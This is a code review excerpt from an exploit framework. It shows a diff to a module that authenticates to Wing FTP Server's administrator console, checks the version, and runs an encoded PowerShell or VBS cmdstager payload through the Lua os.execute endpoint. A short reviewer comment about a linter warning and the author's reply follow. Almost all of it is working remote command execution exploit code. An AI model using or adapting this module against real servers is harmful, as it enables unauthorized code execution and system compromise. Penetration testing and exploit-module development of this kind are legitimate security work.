modules/exploits/windows/ftp/wing_ftp_admin_exec.rb

```diff
@@ -47,41 +53,76 @@ def initialize(info = {})
-    elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
-      return Exploit::CheckCode::Appears
+    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])
+    if @session_cookie.nil?
+      return CheckCode::Unknown
+    end
+
+    ver = send_request_cgi(
+      'uri'       => '/admin_license.html',
+      'method'    => 'POST',
+      'cookie'    => @session_cookie,
+      'ctype'     => 'text/plain;charset=UTF-8'
+    )
+
+    unless ver
+      vprint_error "Connection failed!"
+      return CheckCode::Unknown
     end
 
-    Exploit::CheckCode::Safe
+    unless ver.code == 200 && ver.get_html_document.text.to_s.include?('Wing FTP Server')
+      return CheckCode::Safe
+    end
+
+    @version = Gem::Version.new(ver.body.scan(/Wing FTP Server ([\d\.]+)/).flatten.first)
+    vprint_status "Found Wing FTP Server #{@version}"
+
+    # Lua capabilities and administrator console were added in version 3.0.0
+    if @version >= Gem::Version.new('3.0.0')
+      print_good("Wing FTP Server #{@version}: appears vulnerable.")
+      return CheckCode::Appears
+    end
+
+    return CheckCode::Safe
   end
 
   def exploit
-    username = datastore['USERNAME']
-    password = datastore['PASSWORD']
-    @session_cookie = authenticate(username, password)
+    unless [CheckCode::Appears].include? check
+      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
+    end
+
+    # TODO if target version == 6.0.2.
 
-    print_status("Sending payload")
-    # Execute the cmdstager, max length of the commands is ~1500
-    execute_cmdstager(flavor: :vbs, linemax: 1500)
+    case target.name
+    when 'PowerShell'
+      print_status('Executing payload via Powershell...')
+      # Our command is sent URL-encoded. Version 6.0.2 does not URL decode characters. This causes exploit to fail.
+      # Completely encode Powershell cmd with base64 to subvert this.
+      psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true)
+      execute_command(psh_command)
+    when 'CmdStager'
+      print_status("Sending payload")
+      # Unfortunately, cmdstager still suffers from the "no URL decode" of version 6.0.2.
+      # Recommended: don't use cmdstager versus 6.0.2. Auto-change target? Doesn't seem like a good idea.
+      # Execute the cmdstager, max length of the commands is ~1500
+      execute_cmdstager(flavor: :vbs, linemax: 1500)
+    end
   end
 
   def execute_command(cmd, _opts = {})
-    command = "os.execute('cmd /c #{cmd}')"
+    # Powershell cmd has a lot of special characters. Wrap it with [[ ]] to prevent problems.
+    # We also don't need to append "cmd.exe /c" for the commands
+    command = "os.execute([[#{cmd}]])"
 
     res = send_request_cgi(
-      'uri'       => '/admin_lua_script.html',
+      'uri'       => "/admin_lua_script.html?r=0.#{rand_text_numeric(16)}",
```

Comment:
This upsets `msftidy`.

```
modules/exploits/windows/ftp/wing_ftp_admin_exec.rb - [WARNING] Please use vars_get in send_request_cgi: send_request_cgi( 'uri' => "/admin_lua_script.html?r=0.#{rand_text_numeric(16)
```

`vars_get` is preferred for specifying HTTP GET parameters, in the same way as `vars_post` is used, below.

Reply:
Eh, I'll just remove the offending part in the next commit. It's not as if it's absolutely necessary for the exploit to work.